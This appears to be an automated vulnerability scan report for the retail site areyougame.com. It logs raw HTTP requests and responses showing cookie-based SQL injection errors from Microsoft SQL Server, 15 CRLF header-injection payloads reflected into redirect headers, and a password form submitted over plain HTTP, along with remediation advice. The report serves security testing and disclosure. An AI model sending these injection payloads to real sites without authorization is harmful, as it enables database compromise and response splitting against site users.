GET /interact/refer.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467';
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:18:08 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 364 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:18:08 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The AreYouGame cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AreYouGame cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/review.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866'; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:20:05 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 395 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:20:04 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_log_session_id = 96699467, @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The LogSessionID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the LogSessionID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/review.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467';
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:20:12 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 364 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:20:12 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The AreYouGame cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AreYouGame cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/view_cart.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866'; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:20:29 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 395 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:20:28 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_log_session_id = 96699467, @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The LogSessionID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the LogSessionID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/view_cart.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467';
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:20:39 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 364 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:20:38 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The AreYouGame cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AreYouGame cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /Interact/logon.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866'; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:20:16 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 395 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:20:16 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_log_session_id = 96699467, @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The LogSessionID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the LogSessionID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /Interact/logon.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467';
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:20:29 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 364 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:20:30 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
2. HTTP header injectionpreviousnext There are 15 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 1 is copied into the Location response header. The payload 5ac01%0d%0a885a846ca6f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5ac01%0d%0a885a846ca6f/AYGsearch.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:36 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Location: /interact/processhtml.asp?404;http://www.areyougame.com/5ac01 885a846ca6f/AYGsearch.asp
The value of REST URL parameter 1 is copied into the Location response header. The payload 25722%0d%0ad927f3447bb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /25722%0d%0ad927f3447bb/GiftGuide.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:57 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Location: /interact/processhtml.asp?404;http://www.areyougame.com/25722 d927f3447bb/GiftGuide.asp
The value of REST URL parameter 1 is copied into the Location response header. The payload c95ef%0d%0a498d7efa3b5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /c95ef%0d%0a498d7efa3b5/addto_cart.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:05:15 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Location: /interact/processhtml.asp?404;http://www.areyougame.com/c95ef 498d7efa3b5/addto_cart.asp
The value of REST URL parameter 1 is copied into the Location response header. The payload e28cc%0d%0a25f5cdd1bfc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /e28cc%0d%0a25f5cdd1bfc/catalog.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:05:05 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Location: /interact/processhtml.asp?404;http://www.areyougame.com/e28cc 25f5cdd1bfc/catalog.asp
The value of REST URL parameter 1 is copied into the Location response header. The payload c3453%0d%0a69b37c17a95 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /c3453%0d%0a69b37c17a95/category.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:32 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Location: /interact/processhtml.asp?404;http://www.areyougame.com/c3453 69b37c17a95/category.asp
The value of REST URL parameter 1 is copied into the Location response header. The payload 55b74%0d%0a4975120c673 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /55b74%0d%0a4975120c673/default.asp HTTP/1.1 Host: www.areyougame.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LogSessionID=96699467; AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=222988107.279130543.1293356328.1293356328.1293356328.1; __utmc=222988107; __utmb=222988107.1.10.1293356328; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:05:07 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Location: /interact/processhtml.asp?404;http://www.areyougame.com/55b74 4975120c673/default.asp
The value of REST URL parameter 1 is copied into the Location response header. The payload 941d9%0d%0ae062577ccd5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /941d9%0d%0ae062577ccd5/html.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:31 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Location: /interact/processhtml.asp?404;http://www.areyougame.com/941d9 e062577ccd5/html.asp
The value of REST URL parameter 1 is copied into the Location response header. The payload c4967%0d%0a4a61dd1158e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /c4967%0d%0a4a61dd1158e/item.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:21 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Location: /interact/processhtml.asp?404;http://www.areyougame.com/c4967 4a61dd1158e/item.asp
The value of REST URL parameter 1 is copied into the Location response header. The payload b6626%0d%0a13b6c2b97e0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /b6626%0d%0a13b6c2b97e0/logon.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:25 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Location: /interact/processhtml.asp?404;http://www.areyougame.com/b6626 13b6c2b97e0/logon.asp
The value of REST URL parameter 1 is copied into the Location response header. The payload 5695c%0d%0a19124ef4397 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5695c%0d%0a19124ef4397/newsletter.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:05:01 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Location: /interact/processhtml.asp?404;http://www.areyougame.com/5695c 19124ef4397/newsletter.asp
The value of REST URL parameter 1 is copied into the Location response header. The payload c1e14%0d%0a42b8d2befe4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /c1e14%0d%0a42b8d2befe4/promo.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:09 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Location: /interact/processhtml.asp?404;http://www.areyougame.com/c1e14 42b8d2befe4/promo.asp
The value of REST URL parameter 1 is copied into the Location response header. The payload 17770%0d%0ad84b66007f1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /17770%0d%0ad84b66007f1/refer.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:47 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Location: /interact/processhtml.asp?404;http://www.areyougame.com/17770 d84b66007f1/refer.asp
The value of REST URL parameter 1 is copied into the Location response header. The payload 34085%0d%0a1c9cc462c24 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /34085%0d%0a1c9cc462c24/review.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:48 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Location: /interact/processhtml.asp?404;http://www.areyougame.com/34085 1c9cc462c24/review.asp
The value of REST URL parameter 1 is copied into the Location response header. The payload 5803b%0d%0a8217ac94365 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5803b%0d%0a8217ac94365/view_cart.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:56 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Location: /interact/processhtml.asp?404;http://www.areyougame.com/5803b 8217ac94365/view_cart.asp
The value of REST URL parameter 1 is copied into the Location response header. The payload 74ce4%0d%0a2005bc98fd3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /74ce4%0d%0a2005bc98fd3/logon.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:05:00 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Location: /interact/processhtml.asp?404;http://www.areyougame.com/74ce4 2005bc98fd3/logon.asp
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.areyougame.com/interact/logon.asp
The form contains the following password field:
password
Issue background
